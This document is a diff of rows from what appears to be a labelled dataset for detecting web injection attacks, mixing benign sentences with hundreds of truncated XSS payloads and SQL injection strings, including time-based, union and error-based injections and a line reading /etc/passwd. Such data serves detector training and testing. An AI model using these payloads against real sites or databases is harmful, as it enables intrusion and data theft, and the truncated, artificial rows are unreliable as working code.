-"{""id"":null,""firstName"":""Kelvin"",""lastName"":""Lur"",""",0,normal,27372 -1/*!1111'*/,2,SQLi,22519 -1' and 5835 = 6157 and 'bjee' like 'bjee,2,SQLi,21751 -<strike onpointerout=alert(1)>XSS</strike>,1,XSS,6476 -"javascript:alert()""//</title></textarea></style></",1,XSS,9507 -"-4915' union all select 1928,1928,1928,1928#",2,SQLi,18803 +A select committee was appointed with Mr Hanbury a,0,normal,26421 +"<plaintext onmouseout=""alert(1)"">test</plaintext>",1,XSS,2265 +<samp onfocusout=alert(1) tabindex=1 id=x></samp><,1,XSS,6346 +"Machiavelli, meanwhile, was reading his Discorsi t",0,normal,25899 +-7072' ) or 4144 = ( select upper ( xmltype ( chr ,2,SQLi,18168 +email=test@gmail.com' WAITFOR DELAY '0:0:5'--,2,SQLi,11370 +"<style>@keyframes slidein {}</style><u style=""anim",1,XSS,3546 +&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&,1,XSS,1440 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10710 +select ( case when ( 1898 = 4705 ) then 1898 else ,2,SQLi,16254 +1'|| ( select 'jjpy' from dual where 6295 = 6295,2,SQLi,18821 +Join the hiking expedition next weekend.,0,normal,22944 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4795 +_http://danlec_@.1 style=background-image:url(data,1,XSS,9423 +Select spot.,0,normal,24546 +copy myfile from '/etc/passwd';,2,SQLi,22516 +1' in boolean mode ) and exp ( ~ ( select * from (,2,SQLi,21749 +<object id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,6478 +"javascript:""/*`/*\""/*' /*</stYle/</titLe/</teXtarE",1,XSS,9509 +"1"" ) ) as casz where 5921 = 5921 rlike ( select * ",2,SQLi,18805 "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ",1,XSS,921 -"1 ) ) ) procedure analyse ( extractvalue ( 9255,co",2,SQLi,12172 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,16397 -<style>:target {color:red;}</style><track id=x sty,1,XSS,4869 +-3859 ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,12174 +select ( case when ( 1776 = 7688 ) then 1776 else ,2,SQLi,16399 +<meta onpointermove=alert(1)>XSS</meta>,1,XSS,4871 "exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//",1,XSS,819 -"1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,15873 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10977 -")) or ((x""))=((""x",2,SQLi,9897 -"<script>if(""x\\xE0\xB9\x92"".length==2) { javascrip",1,XSS,454 -"<path d=""M0,0"" style=""marker-start:url(test4.svg#a",1,XSS,9242 -"<script>$=1,alert($)</script>//INJECTX",1,XSS,9849 -url(javascript:alert('')),1,XSS,3458 -Select the perfect outfit.,0,normal,24300 -""" Select Medical Holdings: ""It's very good, a very",0,normal,26465 -Select item.,0,normal,24554 -Please select a topic below to view the reports.,0,normal,25774 -I'll select a movie for us to watch together.,0,normal,23817 -<scr<script>ipt>alert(1)</scr</script>ipt>,1,XSS,941 -"<spacer oncontextmenu=""alert(1)"">test</spacer>",1,XSS,2740 -"select * from users where id = 1 or 1#"", union sel",2,SQLi,11797 -<base onpointerleave=alert(1)>XSS</base>,1,XSS,4197 -"-8919"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,22134 -"1%"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( c",2,SQLi,22108 -"{""id"":null,""name"":""Skarmory""}",0,normal,26987 -"<keygen draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,4072 -1%' ) ) ) and ( 9404 = 8390 ) *8390 and ( ( ( '%' ,2,SQLi,17785 -Select the perfect outfit for the event.,0,normal,24003 -<marquee onstart=alert(1)></marquee>,1,XSS,8223 -"<option oncontextmenu=""alert(1)"">test</option>",1,XSS,8124 -"<pre onkeydown=""alert(1)"" contenteditable>test</pr",1,XSS,6364 -"1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,14451 -<footer onpointerout=alert(1)>XSS</footer>,1,XSS,5797 -"<style>@keyframes x{}</style><pre style=""animation",1,XSS,3678 -"<dfn onmouseleave=""alert(1)"">test</dfn>",1,XSS,8865 -Save up to 30% off select Outdoor Décor and Essent,0,normal,25718 -1' ) as ljpy where 8270 = 8270 or ( select 9173 fr,2,SQLi,22265 -"-9762 ) or elt ( 5773 = 8986,8986 )",2,SQLi,20783 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5189 --4713' ) ) ) or 4567 = 1287,2,SQLi,17493 -1'|| ( select 'adni' from dual where 6611 = 6611,2,SQLi,16777 -ORDER BY 5,2,SQLi,10309 -<spacer id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,2263 -Where's the missing piece of artwork?,0,normal,22751 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,20411 -Delete the unnecessary apps.,0,normal,22650 -"1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""tuhy"" li",2,SQLi,21712 -"-8760"" union all select 2309,2309,2309,2309,2309,2",2,SQLi,13187 -"<image onclick=""alert(1)"">test</image>",1,XSS,1780 -<strike onblur=alert(1) tabindex=1 id=x></strike><,1,XSS,2554 +1 ) or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,15875 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10979 +or 1=1--,2,SQLi,9899 +"<script>if(""x\\xE0\xB9\x92"".length==2) { javascrip",1,XSS,454 +"<root/>//[""'`-->]]>]</div>",1,XSS,9244 +<img/src='x'onerror=alert(1)>//INJECTX,1,XSS,9851 +"<article onbeforepaste=""alert(1)"" contenteditable>",1,XSS,3460 +Carefully select your words.,0,normal,24297 +This plan of creating an electoral college to sele,0,normal,25297 +"{""id"":null,""firstName"":""Kelvin"",""lastName"":""Lur"",""",0,normal,27372 +"Plus, for a limited time only: up to 40% off selec",0,normal,25771 +I need to decide where to have our picnic.,0,normal,23814 +<scr<script>ipt>alert(1)</scr</script>ipt>,1,XSS,941 +"<progress onmousedown=""alert(1)"">test</progress>",1,XSS,2741 +password:*/ = 1--,2,SQLi,11799 +"<nobr onkeypress=""alert(1)"" contenteditable>test</",1,XSS,4199 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,22132 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,22106 +"{""id"":null,""name"":""Weezing""}",0,normal,26984 +"<aside draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,4074 +"1%' ) ) and 4241 = convert ( int, ( select char ( ",2,SQLi,17787 +Select a gift for your loved one.,0,normal,24000 +"<th draggable=""true"" ondragend=""alert(1)"">test</th",1,XSS,8225 +<style>@keyframes slidein {}</style><basefont styl,1,XSS,8126 +"<footer onpaste=""alert(1)"" contenteditable>test</f",1,XSS,6366 +1' where 4388 = 4388,2,SQLi,14453 +"<b draggable=""true"" ondragleave=""alert(1)"">test</b",1,XSS,5799 +"<optgroup draggable=""true"" ondragstart=""alert(1)"">",1,XSS,3680 +<sub onpointermove=alert(1)>XSS</sub>,1,XSS,8867 +"In ' FrontPage Editor ', select the tab at the bot",0,normal,26032 +1' ) as elnu where 5719 = 5719 or 8156 = ( select ,2,SQLi,21452 +"1%"" ) and ( select * from ( select ( sleep ( 5 ) )",2,SQLi,20781 +<keygen onpointermove=alert(1)>XSS</keygen>,1,XSS,5191 +"1"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""qcqx"" like """,2,SQLi,17495 +-8404 ) ) order by 1--,2,SQLi,16779 +ORDER BY 7,2,SQLi,10311 +<picture id=x tabindex=1 onactivate=alert(1)></pic,1,XSS,2264 +Join the music band as a guitarist.,0,normal,22972 +"1"" ) ) and 7656 = 5604 and ( ( ""zuhv"" = ""zuhv",2,SQLi,20409 +Update your wardrobe.,0,normal,22647 +"1' ) and elt ( 4249 = 4249,7259 ) and ( 'ifca' lik",2,SQLi,21710 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13189 +"<tfoot onclick=""alert(1)"">test</tfoot>",1,XSS,1781 +<thead id=x tabindex=1 onfocus=alert(1)></thead>,1,XSS,2555 "{""id"":null,""name"":""shells positive""}",0,normal,27490 -<center onfocusout=alert(1) tabindex=1 id=x></cent,1,XSS,2687 -"&lt;HEAD&gt;&lt;META HTTP-EQUIV=\""CONTENT-TYPE\"" C",1,XSS,1041 -Nordstrom: Enjoy up to 40% off select designer cle,0,normal,25865 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17948 -select ( case when ( 3435 = 4011 ) then 1 else 343,2,SQLi,16940 -<dialog id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,3072 -"<main onclick=""alert(1)"">test</main>",1,XSS,7530 -1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,19912 --3161' ) or 8501 = 1796,2,SQLi,17813 -<address id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,7767 -"""))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11046 -1'+ ( select 'bsva' where 4378 = 4378 or 7552 = ( ,2,SQLi,17801 -1'|| ( select 'ilkr' from dual where 9296 = 9296,2,SQLi,21841 -"1' ) ) procedure analyse ( extractvalue ( 9255,con",2,SQLi,15683 -"From the menu that comes up, select the option ' D",0,normal,26157 -"1"" ) ) as cduw where 4495 = 4495",2,SQLi,15664 -( select ( case when ( 6461 = 1802 ) then 1 else c,2,SQLi,15129 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,22479 -"<dir oncontextmenu=""alert(1)"">test</dir>",1,XSS,7962 -"<ol onpaste=""alert(1)"" contenteditable>test</ol>",1,XSS,7400 -select,0,normal,26555 -Where's the nutrition coach?,0,normal,23638 --3499' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 1,2,SQLi,19430 -ORDER BY 31337#,2,SQLi,10304 -select,0,normal,26553 -<p id=x tabindex=1 onbeforeactivate=alert(1)></p>,1,XSS,5840 -"<html onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2025 -Please select a movie.,0,normal,24347 -"1"" ) as jmwr where 5978 = 5978 rlike ( select ( ca",2,SQLi,22467 -"<!--[if<img src=x onerror=alert(2)//]> -->//[""'`--",1,XSS,9020 -"""),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'",2,SQLi,10895 -1 ) where 2170 = 2170,2,SQLi,17398 -1' where 2911 = 2911,2,SQLi,14832 +"<body onmouseenter=""alert(1)"">test</body>",1,XSS,2688 +"&lt;SCRIPT a=\""&gt;\"" SRC=\""http&#58;//ha&#46;cker",1,XSS,1042 +Now all that's left to do is select your photog.,0,normal,25862 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,17950 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16942 +"<style>@keyframes slidein {}</style><s style=""anim",1,XSS,3073 +"<figcaption onmouseleave=""alert(1)"">test</figcapti",1,XSS,7532 +-5268' ) where 5615 = 5615 or 2724 in ( ( char ( 1,2,SQLi,19910 +"1"" ) ) or 5286 = ( select count ( * ) from all_use",2,SQLi,17815 +"<kbd draggable=""true"" ondrag=""alert(1)"">test</kbd>",1,XSS,7769 +"""))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11048 +"1"" ) where 5005 = 5005 procedure analyse ( extract",2,SQLi,17803 +1'|| ( select 'jonh' from dual where 2415 = 2415 u,2,SQLi,21839 +"-9774' ) ) ) union all select 6954,6954,6954#",2,SQLi,15685 +Select a song to play.,0,normal,24158 +-2781 ) ) ) or 2573 = 5848--,2,SQLi,15666 +-6518' ) ) as vocx where 2539 = 2539 or ( 8652 = 2,2,SQLi,15131 +To browse the repository select Browse from the na,0,normal,25282 +<track onpointerover=alert(1)>XSS</track>,1,XSS,7964 +"<a onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,7402 +select,0,normal,26552 +Where's the nutritionist's office?,0,normal,23635 +1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,19428 +ORDER BY 2,2,SQLi,10306 +select,0,normal,26550 +"<video onmouseover=""alert(1)"">test</video>",1,XSS,5842 +<video autoplay controls onseeking=alert(1)><sourc,1,XSS,2026 +Select the best course.,0,normal,24344 +"1"" ) ) as hace where 8785 = 8785",2,SQLi,22464 +"<![><img src=""]><img src=x onerror=alert(39)//"">",1,XSS,9022 +",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%",2,SQLi,10897 +"1"" ) ) ) rlike ( select ( case when ( 6915 = 4531 ",2,SQLi,17400 +-4684 ) as uqjn where 4550 = 4550 or 1689 = 5825,2,SQLi,14834 <body onpopstate=print()>,1,XSS,29 -<script>\u0061\u006C\u0065\u0072\u0074(1)</script>,1,XSS,9719 +"<iframe src=""javascript:%61%6c%65%72%74%28%31%29"">",1,XSS,9721 "<script\x09type=""text/javascript"">javascript:alert",1,XSS,356 -"<strike oncontextmenu=""alert(1)"">test</strike>",1,XSS,3171 -"1%"" ) ) ) or 9643 = ( select count ( * ) from doma",2,SQLi,15384 -1' ) and 6537 = dbms_pipe.receive_message ( chr ( ,2,SQLi,17581 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17701 -"1%"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 wh",2,SQLi,19429 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5644 -1' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ,2,SQLi,18461 -"<code ondblclick=""alert(1)"">test</code>",1,XSS,3676 -1'|| ( select 'hdpi' where 5620 = 5620 and make_se,2,SQLi,15451 -"-9389' where 5713 = 5713 union all select 5713,571",2,SQLi,17349 -"-8043%"" ) ) ) or make_set ( 9354 = 9354,7185 ) and",2,SQLi,13764 -<image id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,6750 +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,3173 +-2207%' ) or ( 8459 = 8459 ) *4906 and ( '%' = ',2,SQLi,15386 +1' where 1844 = 1844,2,SQLi,17583 +1'+ ( select 'luhy' where 3112 = 3112 and ( 3020 =,2,SQLi,17703 +"1' ) ) and 8148 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,19427 +<multicol id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5646 +"1"" ) ( select ( case when ( 5451 = 5451 ) then reg",2,SQLi,18463 +"<style>@keyframes x{}</style><pre style=""animation",1,XSS,3678 +"-7381' ) ) or elt ( 5882 = 5919,5919 ) and ( ( 'nz",2,SQLi,15453 +"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,17351 +"-9725 ) where 9068 = 9068 or elt ( 4723 = 1426,142",2,SQLi,13766 +"<style>@keyframes x{}</style><map style=""animation",1,XSS,6752 <script>{onerror=alert}throw 1</script>,1,XSS,121 -<img2 onpointerover=alert(1)>XSS</img2>,1,XSS,6795 -"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,21789 -"<rp onmouseleave=""alert(1)"">test</rp>",1,XSS,5580 -1'+ ( select 'sbji' where 7989 = 7989 rlike ( sele,2,SQLi,13684 +<body onmessage=alert(1)>,1,XSS,6797 +"select * from generate_series ( 4975,4975,case whe",2,SQLi,21787 +<svg><dir onload=alert(1)></dir>,1,XSS,5582 +1 and exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,13686 "<svg><script xlink:href=data&colon;,window.open('h",1,XSS,329 -"<br onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,4711 -"<b onpaste=""alert(1)"" contenteditable>test</b>",1,XSS,2371 -<dl id=x tabindex=1 onactivate=alert(1)></dl>,1,XSS,5523 -<h1 onpointerenter=alert(1)>XSS</h1>,1,XSS,2545 -"-9854%"" ) ) ) or 6455 = 3652",2,SQLi,15792 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11078 -Now move the thumb up and down to select text.,0,normal,25861 -"""),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10872 -"1"" ) ) and ( select 2* ( if ( ( select * from ( se",2,SQLi,18563 -<script onpointermove=alert(1)>XSS</script>,1,XSS,4899 -<animate onpointerover=alert(1)>XSS</animate>,1,XSS,5154 -"<IMG SRC=x ondragleave=""alert(String.fromCharCode(",1,XSS,1210 -1' ) and ( select 2* ( if ( ( select * from ( sele,2,SQLi,13363 -"1', ( select ( case when ( 5217 = 5217 ) then 1 el",2,SQLi,20076 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,13069 -I need to decide where to go for a coffee break.,0,normal,23943 -"<bdi onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,3124 +"<blockquote oncut=""alert(1)"" contenteditable>test<",1,XSS,4713 +"<frameset onbeforecopy=""alert(1)"" contenteditable>",1,XSS,2372 +<legend id=x tabindex=1 onactivate=alert(1)></lege,1,XSS,5525 +<small onpointerdown=alert(1)>XSS</small>,1,XSS,2546 +"-4465%' union all select 6196,6196,6196,6196,6196,",2,SQLi,15794 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11080 +Join the parade.,0,normal,22849 +",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10874 +"1"" ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ",2,SQLi,18565 +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,4901 +"<q onbeforecut=""alert(1)"" contenteditable>test</q>",1,XSS,5156 +"<IMG SRC=x ondragover=""alert(String.fromCharCode(8",1,XSS,1211 +"1, ( select ( case when ( 2106 = 2106 ) then ( sel",2,SQLi,13365 +"-4745"" or 5903 = ( 'qqpjq'|| ( select case 5903 wh",2,SQLi,20074 +1%' ) ) and 3580 = ( select count ( * ) from domai,2,SQLi,13071 +I want to select the perfect outfit for the occasi,0,normal,23940 +<header onpointerenter=alert(1)>XSS</header>,1,XSS,3125 "<xss onmouseout=""alert(1)"" style=display:block>tes",1,XSS,79 -1' ) ) ) and 8312 = dbms_pipe.receive_message ( ch,2,SQLi,20064 -"In making cigars by the hand, the operator rolls t",0,normal,26008 -"-3364%"" ) ) ) union all select 5464--",2,SQLi,13013 -After you have highlighted the text that you want ,0,normal,26397 -"<div id=""61""><div style=""\63&#9\06f&#10\0006c&#12\",1,XSS,9138 -"Go to the Games & Apps menu, and then select ""Game",0,normal,26139 -Select your analyze.,0,normal,24993 -"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,20245 -I'm planning to pick up some fresh groceries.,0,normal,23833 -Also streaming for select public libraries and uni,0,normal,26386 -Check data where errors occur.,0,normal,23448 -1' ) ) and 7230 = 2517,2,SQLi,17946 -<style>@keyframes slidein {}</style><applet style=,1,XSS,4870 -1' ) ) ) and ( 8982 = 8027 ) *8027 and ( ( ( 'qkrv,2,SQLi,15606 -"1"" ) where 9499 = 9499",2,SQLi,14486 -<meter onpointerdown=alert(1)>XSS</meter>,1,XSS,6214 -"<bdo draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,1783 -<blink id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,6986 -"1"" ) ) as oiqr where 4073 = 4073 or 8156 = ( selec",2,SQLi,13276 -1' ) waitfor delay '0:0:5',2,SQLi,17480 -<dir id=x tabindex=1 onfocus=alert(1)></dir>,1,XSS,5545 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1947 -select,0,normal,26575 -Steve Grasso was a buyer of the Utilities Select S,0,normal,25520 -1%' ) ) ) union all select null--,2,SQLi,17062 -Specify filters where valid.,0,normal,23333 -"<label draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6790 -%BCscript%BEalert(%A2XSS%A2)%BC/script%BE,1,XSS,1393 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10662 -1' ) as khaa where 8157 = 8157 and 2388 = benchmar,2,SQLi,17137 -"<sup onkeydown=""alert(1)"" contenteditable>test</su",1,XSS,6695 -select * from users where id = '1'<@$$ union selec,2,SQLi,11981 -"<li draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,3216 -`'><script>\xE514\x9A\x80javascript:alert(514)</sc,1,XSS,8990 -1%' ) ( select ( case when ( 4587 = 4587 ) then re,2,SQLi,12405 -or 1=1 –,2,SQLi,9970 -"1' ) where 6672 = 6672 union all select null,null,",2,SQLi,12306 -<noembed onpointerout=alert(1)>XSS</noembed>,1,XSS,1771 -1 ) where 9469 = 9469 or char ( 117 ) ||char ( 111,2,SQLi,20364 -Sort the beads.,0,normal,22819 -",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfo",2,SQLi,10913 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11676 -"<data onpaste=""alert(1)"" contenteditable>test</dat",1,XSS,3023 -<figure id=x tabindex=1 onfocus=alert(1)></figure>,1,XSS,5402 -"<canvas onclick=""alert(1)"">test</canvas>",1,XSS,7857 -declare @s varchar(200) select @s = 0x77616974 ...,2,SQLi,10101 -<td id=x tabindex=1 onbeforeactivate=alert(1)></td,1,XSS,6876 -"1%"" ) ) and 3754 = ( select upper ( xmltype ( chr ",2,SQLi,20689 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,13957 -"<object onmouseup=""alert(1)"">test</object>",1,XSS,4620 -#ERROR!,2,SQLi,22538 -"<audio oncopy=""alert(1)"" contenteditable>test</aud",1,XSS,8720 -"<rp onmousedown=""alert(1)"">test</rp>",1,XSS,8559 -"-3437 ) union all select 7774,7774,7774--",2,SQLi,21672 -end and ( 'nchh' = 'nchh,2,SQLi,14291 -1'+ ( select wgmn where 4368 = 4368 and 7859 = 615,2,SQLi,12517 -javascript:alert('');,1,XSS,7969 -select ( case when ( 5740 = 7636 ) then 5740 else ,2,SQLi,12455 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--",2,SQLi,10653 -"<content onmouseenter=""alert(1)"">test</content>",1,XSS,6826 -/**/or/**/1/**/=/**/1,2,SQLi,10112 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,17086 -The king was indeed the president of the permanent,0,normal,25420 -"<summary onmouseover=""alert(1)"">test</summary>",1,XSS,8160 --8809'|| ( select 'hyzr' where 5694 = 5694 union a,2,SQLi,21404 -"<thead ondblclick=""alert(1)"">test</thead>",1,XSS,4424 -"-5139 ) ) union all select 3373,3373,3373,3373,337",2,SQLi,12160 -"<style>@keyframes x{}</style><html style=""animatio",1,XSS,6863 -<input onpointerout=alert(1)>XSS</input>,1,XSS,6987 -jaVas%0Cript:/*--></tit%0le></st%0yle></text%0area,1,XSS,9491 -1' ) ) as umah where 3781 = 3781 union all select ,2,SQLi,15848 -The state's Republicans will select their Senate c,0,normal,25370 -<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><,1,XSS,7283 -<dir onpointerenter=alert(1)>XSS</dir>,1,XSS,2927 -"<a href=""javascript:alert(1)"" onmouseover=alert(1)",1,XSS,9826 -javascript:confirm(1),1,XSS,9480 -"<sub onclick=""alert(1)"">test</sub>",1,XSS,8734 -And it's driving select members of the media to di,0,normal,26366 -"1"" ) where 1392 = 1392 procedure analyse ( extract",2,SQLi,18813 -"1' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,16875 -"<q onmouseenter=""alert(1)"">test</q>",1,XSS,2014 -Determine fields where valid.,0,normal,23324 -<menuitem onpointerover=alert(1)>XSS</menuitem>,1,XSS,5678 +1,0,normal,26702 +In order to avoid the intestine strife so common i,0,normal,26005 +-9929' ) as gbtc where 8162 = 8162 or 1 group by c,2,SQLi,13015 +"Ahead, enjoy a few select photos of the magical ev",0,normal,26394 +"<div id=""63""><embed src=""javascript:alert(63)""></e",1,XSS,9140 +"Go to your Facebook settings, then select ""Your Fa",0,normal,26136 +Select your examine.,0,normal,24990 +"1%"" and ( select 9067 from ( select count ( * ) ,c",2,SQLi,22327 +I need to select the right music for the party.,0,normal,23830 +select ( case when ( 8601 = 1220 ) then 8601 else ,2,SQLi,21525 +"-5703' ) or elt ( 2972 = 8708,8708 )",2,SQLi,22473 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17948 +"<SCRIPT ="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,4872 +select pg_sleep ( 5 ) and ( '%' = ',2,SQLi,15608 +"1"" ) ) or 8421 = ( select count ( * ) from generat",2,SQLi,14488 +"<style>@keyframes x{}</style><figcaption style=""an",1,XSS,6216 +<spacer id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,1784 +"<mark onmousedown=""alert(1)"">test</mark>",1,XSS,6988 +1'+ ( select 'igoi' where 7823 = 7823 or 8421 = ( ,2,SQLi,13278 +"-4945 or make_set ( 9354 = 9354,7185 )",2,SQLi,17482 +"<track onmouseover=""alert(1)"">test</track>",1,XSS,5547 +"<font oncontextmenu=""alert(1)"">test</font>",1,XSS,1948 +select,0,normal,26572 +Students intending to spend a year in Europe will ,0,normal,25517 +-7874 ) ) ) or 2724 in ( ( char ( 113 ) +char ( 11,2,SQLi,17064 +Search records where applicable.,0,normal,23330 +"<ins onmouseover=""alert(1)"">test</ins>",1,XSS,6792 +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&q,1,XSS,1394 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10664 +"1"" or ( select * from ( select ( sleep ( 5 ) ) ) y",2,SQLi,17139 +"<bdo onkeyup=""alert(1)"" contenteditable>test</bdo>",1,XSS,6697 +"select * from users where id = 1 or "",&"" or 1 = 1 ",2,SQLi,11983 +"<template draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,3218 +`'><script>\xEF\xBF\xAEjavascript:alert(526)</scri,1,XSS,8992 +"1"" ) ) ) ( select ( case when ( 5451 = 5451 ) then",2,SQLi,12407 +or 1=1/*,2,SQLi,9972 +"1"" ) and ( 3020 = 3020 ) *6703 and ( ""hkjf"" = ""hkj",2,SQLi,12308 +"<data onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,1772 +-4484' ) ) or 6872 = 6872 and ( ( 'oxuo' = 'oxuo,2,SQLi,20362 +Delete the data.,0,normal,22816 +""",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10915 +‘ or 3 = 3 --,2,SQLi,11678 +"<noframes onkeyup=""alert(1)"" contenteditable>test<",1,XSS,3024 +<samp onpointerup=alert(1)>XSS</samp>,1,XSS,5404 +"<menu onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,7859 +or a=a,2,SQLi,10103 +"<style>@keyframes slidein {}</style><em style=""ani",1,XSS,6878 +1 ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 1233 =,2,SQLi,20687 +"1"" ) ) ) and 4241 = convert ( int, ( select char (",2,SQLi,13959 +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,4622 +#ERROR!,2,SQLi,22535 +<thead onpointerup=alert(1)>XSS</thead>,1,XSS,8722 +<bgsound id=x tabindex=1 onfocusin=alert(1)></bgso,1,XSS,8561 +"1 and elt ( 3172 = 7243,7243 )",2,SQLi,21544 +"1"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""dpl",2,SQLi,14293 +-6200%' ) ) or 8077 = 4661,2,SQLi,12519 +"<u onmouseenter=""alert(1)"">test</u>",1,XSS,7971 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,12457 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10655 +<style>:target {color:red;}</style><dir id=x style,1,XSS,6828 +or (EXISTS),2,SQLi,10114 +"1"" ) where 4951 = 4951",2,SQLi,17088 +"1"" ) ) ) and 6414 = ( select count ( * ) from rdb$",2,SQLi,19341 +"<b onkeyup=""alert(1)"" contenteditable>test</b>",1,XSS,8162 +1' ) ) ) waitfor delay '0:0:5'--,2,SQLi,21402 +<template id=x tabindex=1 onfocusin=alert(1)></tem,1,XSS,4426 +1' ) as rvch where 1863 = 1863 or 8384 = like ( 'a,2,SQLi,12162 +<blink onpointerover=alert(1)>XSS</blink>,1,XSS,6865 +"<tr onmousedown=""alert(1)"">test</tr>",1,XSS,6989 +"javascript:""/*'/*`/*\"" /*</title></style></textare",1,XSS,9493 +"-9315' ) ) ) union all select 5057,5057,5057,5057,",2,SQLi,15850 +The teacher or teachers need to select the key wor,0,normal,25367 +<th onpointerup=alert(1)>XSS</th>,1,XSS,7285 +<svg><dt onload=alert(1)></dt>,1,XSS,2928 +alert(1)>//INJECTX,1,XSS,9828 +\x1Cjavascript:javascript:confirm(1),1,XSS,9482 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8736 +Select the next place to explore.,0,normal,24049 +"1' ) or 6979 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,18815 +-7775 or 8571 = 8571--,2,SQLi,16877 +"<element onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,2015 +Calculate totals where valid.,0,normal,23321 +"<rb draggable=""true"" ondrag=""alert(1)"">test</rb>",1,XSS,5680 "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:tex",1,XSS,948 -"-1004"" where 6266 = 6266 order by 1#",2,SQLi,20806 -<xss id=x tabindex=1 onbeforeactivate=alert(1)></x,1,XSS,2148 -"<data draggable=""true"" ondrag=""alert(1)"">test</dat",1,XSS,8789 --6566' ) as kggb where 9768 = 9768 order by 1--,2,SQLi,19090 -"<caption oncut=""alert(1)"" 